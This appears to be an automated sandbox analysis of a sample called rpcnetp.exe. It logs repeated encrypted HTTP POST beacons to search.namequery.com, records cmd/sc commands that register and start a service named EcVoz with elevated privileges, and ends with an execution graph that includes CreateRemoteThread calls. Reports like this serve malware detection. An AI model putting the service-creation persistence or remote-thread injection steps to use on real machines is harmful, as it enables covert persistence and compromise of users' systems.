Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 9f ad e9 5a 2d ce fa 8c da ff be 2a 8f e5 7e 0d 0a
Data Ascii: ~Z-*~
Oct 7, 2021 21:25:48.783839941 CEST2679OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 b1 6d 17 00 b7 28 e1 b6 04 00 b6 86 3d a6 2b 1c 89 7e
Data Ascii: ~` m(=+~
Oct 7, 2021 21:25:48.950016022 CEST2679INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e a5 16 ae cc a2 2f 36 05 56 8e 3b 47 20 7e 0d 0a
Data Ascii: ~/6V;G ~
Oct 7, 2021 21:25:48.952986956 CEST2680OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 74
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 56 5c ab 7d 31 b1 6d 17 00 36 00 bf 48 62 94 bb f9 81 74 54 55 a9 bf 56 32 29 cd 3e b9 76 b7 29 ab 3d f4 0c cb ef 3e 34 90 a9 09 6f c0 4b 9c ff 91 3f 26 ff 58 95 a9 39 18 70 57 e2 21 d5 02 bf fd 3c 82 af 7e
Data Ascii: ~` V\}1m6HbtTUV2)>v)=>4oK?&X9pW!<~
Oct 7, 2021 21:25:49.117723942 CEST2680INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 24 ab 74 12 c8 45 f6 07 cd d7 4c 56 af 7e 0d 0a
Data Ascii: ~$tELV~
Oct 7, 2021 21:25:49.120628119 CEST2680OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 75
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 26 aa 47 e0 56 5c ab 7d 31 36 00 8b 0f 61 46 67 86 93 29 e7 ed fa 76 75 3e 2e 6c 0a 07 41 29 f7 3a d9 59 df ee 7d 33 d1 4a b3 56 1a 71 02 41 3a f8 bd 4b e9 0f 72 5e 6d 96 c9 e7 df 5d 40 bc 73 22 1a 4d 12 f7 7e
Data Ascii: ~` &GV\}16aFg)vu>.lA):Y}3JVqA:Kr^m]@s"M~
Oct 7, 2021 21:25:49.287314892 CEST2681INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 0e 18 1c d3 ee b1 7f be 4e 6d 5d da c8 7e 0d 0a
Data Ascii: ~Nm]~
Oct 7, 2021 21:25:49.289769888 CEST2681OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 74
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 58 af 9e 22 26 aa 47 e0 36 00 bf f5 d9 0b 2f f9 b5 bd 50 1a 1d 33 36 89 9f 89 d8 24 34 26 d3 5e dd 6c 16 89 b0 3b 38 32 8e 20 a5 96 80 ef a7 3c 59 74 4a 21 05 5a e3 37 a0 26 21 ad e0 bb 58 81 5e 7d 33 cd 7e
Data Ascii: ~` X"&G6/P36$4&^l;82 <YtJ!Z7&!X^}3~
Oct 7, 2021 21:25:49.455056906 CEST2681INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 2e 57 84 58 ed b5 9d 57 79 89 6e f6 c6 7e 0d 0a
Data Ascii: ~.WXWyn~
Oct 7, 2021 21:25:49.459754944 CEST2682OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 75
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 63 e2 18 12 58 af 9e 22 36 00 ed 31 18 cd a3 4e 39 fa 5f 57 7d 5d 62 c4 3c 52 51 48 48 06 88 56 f9 82 87 8f ce 59 41 c7 7d 5e 73 b4 48 18 43 ca a9 7a 84 48 59 4b ee 3f e2 51 61 72 18 55 3f 29 b4 7f 6f cd 84 7e
Data Ascii: ~` cX"61N9_W}]b<RQHHVYA}^sHCzHYK?QarU?)o~
Oct 7, 2021 21:25:49.626085043 CEST2682INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 30 dc 60 6a a1 68 1f 7f 93 cd 7f e8 75 7e 0d 0a
Data Ascii: ~0`jhu~
Oct 7, 2021 21:25:49.630515099 CEST2682OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 25
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 29 ca 4a 6e 63 e2 18 12 06 00 6c fd 4c 93 9a 45 78 96 fa 7e
Data Ascii: ~` )JnclLEx~
Oct 7, 2021 21:25:49.795301914 CEST2682INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 96 64 35 be 1f 4b 59 a6 34 86 08 20 7d 31 7e 0d 0a
Data Ascii: ~d5KY4 }1~
Oct 7, 2021 21:25:49.801758051 CEST2683OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 b9 90 01 87 29 ca 4a 6e 04 00 c7 bc 52 67 09 e5 ab 7e
Data Ascii: ~` )JnRg~
Oct 7, 2021 21:25:49.966474056 CEST2683INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 7f ba 53 14 de 3e c6 12 a6 7d 31 19 96 28 7e 0d 0a
Data Ascii: ~S>}1(~
Oct 7, 2021 21:25:49.969285965 CEST2683OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 9a 8c 84 db b9 90 01 87 04 00 66 59 79 22 1a 80 ef 7e
Data Ascii: ~` fYy"~
Oct 7, 2021 21:25:50.134128094 CEST2684INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 38 f7 34 98 0b 46 4f 6f 64 cc 6c 2a ee 4a 7e 0d 0a
Data Ascii: ~84FOodl*J~
Oct 7, 2021 21:25:50.136079073 CEST2684OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 83 7c e2 57 9a 8c 84 db 04 00 ba f8 1c 95 2b 66 96 7e
Data Ascii: ~` |W+f~
Oct 7, 2021 21:25:50.306108952 CEST2684INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 9f 74 6e 78 e0 27 3b 9b 4a 8f df 3b 26 ad 7e 0d 0a
Data Ascii: ~tnx';J;&~
Oct 7, 2021 21:25:50.308320999 CEST2684OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 01 8a 01 94 83 7c e2 57 04 00 4e 31 80 e9 3c a2 ed 7e
Data Ascii: ~` |WN1<~
Oct 7, 2021 21:25:50.473535061 CEST2685INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 19
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e ab 5d 65 d5 98 68 f4 c5 7b 7d 5e 5c 4c 89 33 7e 0d 0a
Data Ascii: ~]eh{}^\L3~
Oct 7, 2021 21:25:50.476890087 CEST2685OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 32 ec 6f 08 01 8a 01 94 04 00 b7 27 00 5b 4d 19 36 7e
Data Ascii: ~` 2o'[M6~
Oct 7, 2021 21:25:50.641959906 CEST2685INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 1b ea 4e 95 e3 3e 94 5a c4 b0 2d 5d a8 a9 7e 0d 0a
Data Ascii: ~N>Z-]~
Oct 7, 2021 21:25:50.646055937 CEST2686OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 24
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 91 d5 a3 2c 32 ec 6f 08 04 00 bf 41 1e ce 5e 7d 5e 59 7e
Data Ascii: ~` ,2oA^}^Y~
Oct 7, 2021 21:25:50.810699940 CEST2686INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e a5 4c 82 47 77 7d 5e d8 65 89 ad 6e bc 64 7e 0d 0a
Data Ascii: ~LGw}^end~
Oct 7, 2021 21:25:50.813941956 CEST2686OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 73
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 eb c4 fd 73 91 d5 a3 2c 36 00 1a 9c aa 55 ec c2 1d c7 e5 29 4e 30 77 2a 94 8f f2 a3 09 c7 f8 98 e7 9f 05 36 a8 47 0a 70 4a 2b ac ff 5e 73 c2 56 0e 92 5e 4a 18 09 f9 9e 75 aa 3e f5 5a 84 5b 19 6f d8 2e 7e
Data Ascii: ~` s,6U)N0w*6GpJ+^sV^Ju>Z[o.~
Oct 7, 2021 21:25:50.978565931 CEST2686INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 23
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 38 07 f2 64 0e ea 99 ae 90 23 0f 5a a8 9c 5f 66 7f 7a 6b 7e 0d 0a
Data Ascii: ~8d#Z_fzk~
Oct 7, 2021 21:25:50.982218981 CEST2687OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 40 fc cc 0f eb c4 fd 73 04 00 2e 16 63 8e 78 96 93 7e
Data Ascii: ~` @s.cx~
Oct 7, 2021 21:25:51.147799969 CEST2687INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e f6 16 e1 c9 c6 fc a9 e1 3c c1 b7 08 d9 47 7e 0d 0a
Data Ascii: ~<G~
Oct 7, 2021 21:25:51.150238991 CEST2687OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 bb 46 d2 71 40 fc cc 0f 04 00 8c 64 a2 89 09 6f c8 7e
Data Ascii: ~` Fq@do~
Oct 7, 2021 21:25:51.314759016 CEST2688INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 1b 69 da a4 bf 72 69 c0 97 a5 19 1c a6 7e 0d 0a
Data Ascii: ~iri~
Oct 7, 2021 21:25:51.317600965 CEST2688OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 aa 66 c1 35 bb 46 d2 71 04 00 ac a6 8a ab 1a 1b 8b 7e
Data Ascii: ~` f5Fq~
Oct 7, 2021 21:25:51.482516050 CEST2688INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 93 78 7b 43 dd e7 4f 4c b0 6d 2a 1b e1 7e 0d 0a
Data Ascii: ~x{COLm*~
Oct 7, 2021 21:25:51.486161947 CEST2688OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 f1 49 9c 97 aa 66 c1 35 04 00 65 fe 34 e4 2b fe ed 7e
Data Ascii: ~` If5e4+~
Oct 7, 2021 21:25:51.651395082 CEST2689INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 30
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 7d 31 af 1f cb 41 bd b0 6d 8f 4e ee c3 e1 8c 0f c3 ef 7b f9 d6 3f fc 3b be 31 7e 0d 0a
Data Ascii: ~}1AmN{?;1~
Oct 7, 2021 21:25:51.654524088 CEST2689OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 a1 ab 57 42 f1 49 9c 97 04 00 2b 9a 89 dc 3c 08 e1 7e
Data Ascii: ~` WBI+<~
Oct 7, 2021 21:25:51.820671082 CEST2689INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 29
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 8c eb 5b 1a f3 ba f2 61 9d 63 cf 99 0f 0e e4 e8 fa e6 34 bf e7 30 4c 5e 58 7e 0d 0a
Data Ascii: ~[ac40L^X~
Oct 7, 2021 21:25:51.827167988 CEST2690OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 ac 14 1a 98 a1 ab 57 42 04 00 78 e0 64 ea 4d c9 67 7e
Data Ascii: ~` WBxdMg~
Oct 7, 2021 21:25:51.991864920 CEST2690INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e d7 73 8b 5f 7d 31 29 f4 49 94 fe 5d b0 3a 7e 0d 0a
Data Ascii: ~s_}1)I]:~
Oct 7, 2021 21:25:51.995599031 CEST2690OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 283
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 fe 6b d1 e4 ac 14 1a 98 04 01 57 ae 27 37 ec 7b 2e c1 a6 ab 21 bc 35 e3 5f 14 b6 ef 36 59 67 02 8c 45 ed 3f 85 89 40 53 89 cb 87 87 6e 7a a6 7a 46 e8 05 c9 7d 31 e9 89 1a 5c 37 75 cc 1c 6e e5 be 86 9b 4f d4 a8 77 bf ac 97 2d 31 56 82 ac 0e bd c9 80 d5 8f ab dc 7d 33 db d7 01 71 19 c2 d8 a0 b2 9a 9e bd 94 74 33 26 9e e1 02 4f 87 6e ef 7d 5e 22 9e 80 7b 39 ba 76 2a 2b 71 2e e1 eb 6b 2c e1 d1 8d ff 03 43 ab ee b4 12 17 4b b0 5b c6 b4 a6 47 ab f9 be de 7c f0 c1 fb 6a e0 6d 58 b3 c7 58 93 95 c0 f5 32 85 fd df 1b 94 c1 6e 5b d1 f3 56 91 c8 e4 31 07 e0 f1 de 62 63 fe 69 54 71 66 33 00 1d 0f 5b 86 18 75 6c b0 4b e2 92 e8 32 76 f8 25 68 c2 79 7c 9c 55 1d 4a 3d e1 94 da b2 5f 1e 0b 77 f8 4d 58 df b7 10 64 b2 18 a8 08 f5 d5 ae 4d 5d 91 f4 98 9d 87 59 7a 17 93 71 f9 17 f3 cb 3c 6e a0 4b 3f 07 30 c6 7d 5d d0 a9 5a fb cb 47 5e 25 1a 7e
Data Ascii: ~` kW'7{.!5_6YgE?@SnzzF}1\7unOw-1V}3qt3&On}^"{9v*+q.k,CK[G|jmXX2n[V1bciTqf3[ulK2v%hy|UJ=_wMXdM]Yzq<nK?0}]ZG^%~
Oct 7, 2021 21:25:52.162159920 CEST2691INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 63
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 54 27 5b ef 0c eb a2 19 4e 8c 82 04 81 37 a5 97 dc 59 08 ae b5 e7 25 1d 8a 89 f9 49 ab 7d 31 42 21 e2 70 53 7d 5e c3 7a 30 5d b7 6c 86 80 77 47 61 38 2b a2 3a 42 69 22 6e 94 27 7e 0d 0a
Data Ascii: ~T'[N7Y%I}1B!pS}^z0]lwGa8+:Bi"n'~
Oct 7, 2021 21:25:52.169229031 CEST2691OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 24
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 51 7d 31 1d bd fe 6b d1 e4 04 00 97 9a fb 2b 6f b4 af 7e
Data Ascii: ~` Q}1k+o~
Oct 7, 2021 21:25:52.333781004 CEST2691INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 29
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e aa 56 e7 fd d2 6a d7 d3 1a 20 ab 07 d7 90 e4 e6 bf 78 c7 33 1d cf 7f 1f df 7e 0d 0a
Data Ascii: ~Vj x3~
Oct 7, 2021 21:25:52.339021921 CEST2692OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 24
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 97 79 e1 0d 51 7d 31 1d bd 04 00 1f 3b 44 c0 78 8c 14 7e
Data Ascii: ~` yQ}1;Dx~


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

  • File
  • Registry

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Start time:21:23:35
Start date:07/10/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Start time:21:23:37
Start date:07/10/2021
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Imagebase:0x10e0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Start time:21:23:38
Start date:07/10/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c sc start EcVoz >> C:\servicestart.log 2>&1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Start time:21:23:39
Start date:07/10/2021
Path:C:\Users\user\Desktop\rpcnetp.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\rpcnetp.exe
Imagebase:0xa10000
File size:22932 bytes
MD5 hash:57BD3200910A8D2C85B1927B27123A6B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Start time:21:23:41
Start date:07/10/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Imagebase:0xfa0000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:5.6%
Dynamic/Decrypted Code Coverage:97.5%
Signature Coverage:11.8%
Total number of Nodes:813
Total number of Limit Nodes:14

Graph

Show Legend
Hide Nodes/Edges
execution_graph 3487 a11829 3488 a11835 3487->3488 3489 a1185a WaitForSingleObject 3488->3489 3497 a11868 3488->3497 3489->3497 3490 a119bc 3492 a11902 WaitForSingleObject 3492->3497 3493 a115cc LeaveCriticalSection ResetEvent EnterCriticalSection RaiseException 3493->3497 3495 a1210c RaiseException 3495->3497 3497->3490 3497->3492 3497->3493 3497->3495 3498 a12429 11 API calls 3497->3498 3499 a1294c 3497->3499 3503 a1162f 3497->3503 3513 a129e4 3497->3513 3498->3497 3500 a1295b 3499->3500 3501 a12970 wsprintfA 3500->3501 3502 a129ab 3501->3502 3502->3497 3504 a11650 3503->3504 3505 a1163f 3503->3505 3526 a11a7e 3504->3526 3519 a1278e 3505->3519 3508 a1164b 3508->3497 3509 a116aa 3529 a115ad LeaveCriticalSection 3509->3529 3511 a11657 3511->3509 3512 a11696 SetEvent 3511->3512 3512->3511 3515 a129f0 3513->3515 3514 a12a56 lstrcpyA 3516 a12a89 3514->3516 3515->3514 3517 a12a9a 3515->3517 3516->3517 3518 a12a8d lstrcpyA 3516->3518 3517->3497 3518->3517 3520 a11a7e 2 API calls 3519->3520 3521 a1279f 3520->3521 3532 a1253c GetStdHandle 3521->3532 3524 a115ad 2 API calls 3525 a127ca 3524->3525 3525->3508 3538 a11ae3 3526->3538 3530 a11ae3 RaiseException 3529->3530 3531 a115c7 3530->3531 3531->3508 3537 a13223 3532->3537 3534 a1255a CreateRemoteThread 3535 a12590 3534->3535 3536 a12575 WaitForSingleObject GetExitCodeThread CloseHandle 3534->3536 3535->3524 3536->3535 3537->3534 3539 a11af2 3538->3539 3540 a11a8b EnterCriticalSection 3538->3540 3542 a1210c RaiseException 3539->3542 3540->3511 3542->3540 3543 a11c2c 3546 a11f95 3543->3546 3545 a11c37 ExitThread 3568 a14a94 3546->3568 3548 a11fa4 GetStdHandle 3549 a11fcf 3548->3549 3569 a14d44 3549->3569 3551 a12004 3552 a12031 GetStdHandle 3551->3552 3553 a1206c 3551->3553 3552->3553 3554 a1203a 3552->3554 3572 a11775 3553->3572 3556 a12052 CreateRemoteThread 3554->3556 3556->3553 3558 a120ee 3597 a14dc6 3558->3597 3560 a11775 13 API calls 3562 a120a6 3560->3562 3561 a12104 3561->3545 3562->3558 3563 a120b9 3562->3563 3580 a12429 3562->3580 3565 a120e1 3563->3565 3566 a120be ResumeThread WaitForMultipleObjects CloseHandle 3563->3566 3565->3558 3593 a11d27 3565->3593 3566->3558 3568->3548 3570 a14d58 3569->3570 3571 a14d61 GetVersion 3570->3571 3571->3551 3573 a11818 3572->3573 3574 a1178a InitializeCriticalSection CreateEventA CreateEventA 3572->3574 3573->3558 3573->3560 3575 a11812 3574->3575 3576 a117dd 3574->3576 3577 a116ba 8 API calls 3575->3577 3576->3575 3578 a11801 SetThreadPriority 3576->3578 3579 a117e6 CreateThread 3576->3579 3577->3573 3578->3573 3579->3575 3579->3578 3581 a12446 3580->3581 3582 a1245a 3580->3582 3583 a12449 3581->3583 3584 a1245c SetEvent 3581->3584 3582->3584 3585 a12468 3583->3585 3586 a1244c ResetEvent 3583->3586 3584->3585 3587 a124b3 3585->3587 3588 a11a7e 2 API calls 3585->3588 3586->3585 3587->3563 3589 a1247a WaitForSingleObject 3588->3589 3590 a1253c 5 API calls 3589->3590 3591 a124ab 3590->3591 3592 a115ad 2 API calls 3591->3592 3592->3587 3594 a11d33 3593->3594 3595 a11d78 3594->3595 3596 a14dc6 3 API calls 3594->3596 3595->3565 3596->3595 3598 a14dd2 3597->3598 3603 a134a6 3598->3603 3600 a14dde 3608 a11b4e 3600->3608 3602 a14de7 3602->3561 3604 a134b2 3603->3604 3605 a134cf LocalAlloc 3604->3605 3606 a134bf LocalFree 3604->3606 3607 a13511 3605->3607 3606->3607 3607->3600 3609 a11b58 3608->3609 3610 a11b98 3609->3610 3611 a11b8a LocalFree 3609->3611 3610->3602 3611->3609 3668 72b21c2c 3671 72b21f95 3668->3671 3670 72b21c37 ExitThread 3693 72b24a94 3671->3693 3673 72b21fa4 GetStdHandle 3674 72b21fcf 3673->3674 3694 72b24d44 3674->3694 3676 72b22004 3677 72b2206c 3676->3677 3678 72b22031 GetStdHandle 3676->3678 3697 72b21775 3677->3697 3678->3677 3679 72b2203a 3678->3679 3681 72b22052 CreateRemoteThread 3679->3681 3681->3677 3683 72b220ee 3722 72b24dc6 3683->3722 3685 72b21775 13 API calls 3687 72b220a6 3685->3687 3686 72b22104 3686->3670 3687->3683 3688 72b220b9 3687->3688 3705 72b22429 3687->3705 3690 72b220e1 3688->3690 3691 72b220be ResumeThread WaitForMultipleObjects CloseHandle 3688->3691 3690->3683 3718 72b21d27 3690->3718 3691->3683 3693->3673 3695 72b24d58 3694->3695 3696 72b24d61 GetVersion 3695->3696 3696->3676 3698 72b21818 3697->3698 3699 72b2178a InitializeCriticalSection CreateEventA CreateEventA 3697->3699 3698->3683 3698->3685 3700 72b21812 3699->3700 3701 72b217dd 3699->3701 3728 72b216ba 3700->3728 3701->3700 3703 72b21801 SetThreadPriority 3701->3703 3704 72b217e6 CreateThread 3701->3704 3703->3698 3704->3700 3704->3703 3706 72b22446 3705->3706 3707 72b2245a 3705->3707 3708 72b22449 3706->3708 3709 72b2245c SetEvent 3706->3709 3707->3709 3710 72b22468 3708->3710 3711 72b2244c ResetEvent 3708->3711 3709->3710 3712 72b224b3 3710->3712 3713 72b21a7e 2 API calls 3710->3713 3711->3710 3712->3688 3714 72b2247a WaitForSingleObject 3713->3714 3715 72b2253c 5 API calls 3714->3715 3716 72b224ab 3715->3716 3717 72b215ad 2 API calls 3716->3717 3717->3712 3719 72b21d33 3718->3719 3720 72b21d78 3719->3720 3721 72b24dc6 3 API calls 3719->3721 3720->3690 3721->3720 3723 72b24dd2 3722->3723 3741 72b234a6 3723->3741 3725 72b24dde 3746 72b21b4e 3725->3746 3727 72b24de7 3727->3686 3729 72b21759 3728->3729 3730 72b216cf EnterCriticalSection 3728->3730 3729->3698 3731 72b216f9 SetEvent 3730->3731 3732 72b216fc 3730->3732 3731->3732 3733 72b21706 SetEvent 3732->3733 3734 72b21709 3732->3734 3733->3734 3735 72b21734 3734->3735 3736 72b21719 WaitForSingleObject CloseHandle 3734->3736 3737 72b21741 3735->3737 3738 72b2173e CloseHandle 3735->3738 3736->3735 3739 72b2174b CloseHandle 3737->3739 3740 72b2174e DeleteCriticalSection 3737->3740 3738->3737 3739->3740 3740->3729 3742 72b234b2 3741->3742 3743 72b234cf LocalAlloc 3742->3743 3744 72b234bf LocalFree 3742->3744 3745 72b23511 3743->3745 3744->3745 3745->3725 3747 72b21b58 3746->3747 3748 72b21b98 3747->3748 3749 72b21b8a LocalFree 3747->3749 3748->3727 3749->3747 3808 a11985 3809 a119a5 3808->3809 3811 a119af 3808->3811 3810 a1278e 8 API calls 3809->3810 3810->3811 3812 a14e04 3813 a14eaf 3812->3813 3818 a14e29 3812->3818 3814 a14e71 GetProcAddress 3814->3818 3815 a14e67 GetModuleHandleA 3815->3818 3818->3813 3818->3814 3818->3815 3821 a14ef1 GetVersion 3818->3821 3823 a11b20 LocalAlloc 3818->3823 3825 a11b01 3818->3825 3828 a1175e RaiseException 3818->3828 3822 a14f08 3821->3822 3822->3818 3824 a11b39 3823->3824 3824->3818 3829 a11c40 3825->3829 3828->3818 3830 a11b14 LocalFree 3829->3830 3830->3818 3833 a13504 3836 a11e8c 3833->3836 3835 a1350e 3837 a11ec0 GetStdHandle TerminateProcess ExitProcess 3836->3837 3838 a11e96 3836->3838 3838->3837 3839 a11e9f 3838->3839 3839->3835 3859 a11d8d 3860 a11e8c 3 API calls 3859->3860 3861 